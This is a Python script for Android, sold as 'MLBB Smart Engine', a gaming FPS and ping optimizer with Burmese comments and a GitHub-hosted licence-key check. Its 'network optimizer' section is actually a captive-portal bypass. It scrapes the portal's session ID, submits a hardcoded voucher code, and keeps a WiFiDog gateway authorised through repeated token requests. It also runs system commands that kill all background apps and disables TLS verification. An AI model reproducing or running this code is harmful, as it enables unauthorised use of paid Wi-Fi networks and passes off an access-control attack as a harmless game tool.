import subprocess, requests, re, urllib3, time, threading, os, socket, uuid
from urllib.parse import urlparse, parse_qs, urljoin

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# --- [ SECTION 0: FPS & SMOOTHNESS OPTIMIZER ] ---
def smooth_gaming_mode():
    """ ဇာတ်ကောင်တွေ လေးမနေအောင် FPS တိုးပေးသည့် စနစ် """
    try:
        # Background Apps တွေကို အကုန်ရှင်းထုတ်ပြီး RAM နေရာလွတ်ယူခြင်း
        os.system("am kill-all")
        # Touch တုန့်ပြန်မှု မြန်အောင်လုပ်ခြင်း
        os.system("settings put global touch_exploration_enabled 0")
        # Animation တွေကို လုံးဝပိတ်ပြီး GPU ဝန်ကို လျှော့ချခြင်း
        os.system("settings put global window_animation_scale 0")
        os.system("settings put global transition_animation_scale 0")
        os.system("settings put global animator_duration_scale 0")
        print("\033[92m[✓] FPS BOOSTED: SMOOTH MODE ACTIVE\033[0m")
    except: pass

# --- [ SECTION 1: NETWORK OPTIMIZER ] ---
def immortal_pulse(auth_link, session):
    """ လိုင်းမကျအောင် လုပ်ပေးမည့်အပိုင်း (Thread လျှော့ထားသည်) """
    while True:
        try:
            # Thread အများကြီးသုံးမယ့်အစား အချိန် 0.2 စက္ကန့်ခြားပြီး ပိုတည်ငြိမ်အောင်လုပ်သည်
            session.get(auth_link, timeout=1.5, headers={"Connection": "keep-alive"}, verify=False)
            time.sleep(0.2) 
        except: time.sleep(1)

def start_starlink_engine():
    main_session = requests.Session()
    # Connection Pool ကို အချိုးကျ ချိန်ညှိခြင်း (CPU မလေးစေရန်)
    adapter = requests.adapters.HTTPAdapter(pool_connections=50, pool_maxsize=50)
    main_session.mount('http://', adapter)
    
    while True:
        try:
            r = main_session.get("http://connectivitycheck.gstatic.com/generate_204", timeout=3)
            if r.status_code != 204:
                p_url = r.url
                r1 = main_session.get(p_url, timeout=3); match = re.search(r"location\.href\s*=\s*['\"]([^'\"]+)['\"]", r1.text)
                n_url = urljoin(p_url, match.group(1)) if match else p_url
                r2 = main_session.get(n_url, timeout=3); sid = parse_qs(urlparse(r2.url).query).get('sessionId', [None])[0]
                if sid:
                    p_host = f"{urlparse(p_url).scheme}://{urlparse(p_url).netloc}"
                    main_session.post(f"{p_host}/api/auth/voucher/", json={'accessCode': '123456', 'sessionId': sid}, timeout=3)
                    gw = parse_qs(urlparse(p_url).query).get('gw_address', ['192.168.60.1'])[0]
                    port = parse_qs(urlparse(p_url).query).get('gw_port', ['2060'])[0]
                    auth_link = f"http://{gw}:{port}/wifidog/auth?token={sid}"
                    
                    # Thread ၅ ခုပဲ သုံးပါမယ် (ဒါမှ ဖုန်းမလေးမှာပါ)
                    for _ in range(5):
                        threading.Thread(target=immortal_pulse, args=(auth_link, main_session), daemon=True).start()
            time.sleep(5)
        except: time.sleep(2)

# --- [ SECTION 2: MAIN ] ---
def main():
    os.system('clear')
    smooth_gaming_mode() # FPS Optimizer ကို အရင် Run မည်
    my_id = f"{os.popen('getprop ro.product.brand').read().strip()}-{os.popen('getprop ro.product.model').read().strip()}".upper()
    
    print("\033[92m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    print("\033[96m   🛡️  MLBB SMART ENGINE v12.5 (STABLE)  🛡️")
    print("\033[93m   STATUS: BALANCE MODE (LOW PING + HIGH FPS)")
    print("\033[92m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\033[0m")
    
    threading.Thread(target=start_starlink_engine, daemon=True).start()
    time.sleep(2)
    
    print(f"\033[95m[ Device ID: {my_id} ]\033[0m\n")
    user_key = input("\033[93m[?] Enter Key: \033[0m").strip()
    
    # Verify via GitHub (Timestamp cache-free)
    url = f"https://raw.githubusercontent.com/kophyo-ops/mlbb-v12/main/keys.txt?t={int(time.time())}"
    try:
        r = requests.get(url, timeout=10, verify=False, headers={'Cache-Control': 'no-cache'})
        if r.status_code == 200:
            if any(f"{user_key}:{my_id}" in line.strip() for line in r.text.splitlines()):
                print("\033[92m\n[✓] ACCESS GRANTED! SMOOTH PLAY ENABLED.\033[0m")
                while True: time.sleep(100)
            else: print("\033[91m\n[!] Invalid Key!\033[0m"); os._exit(0)
    except: print("\033[91m\n[!] Connection Error!\033[0m")

if __name__ == "__main__":
    main()
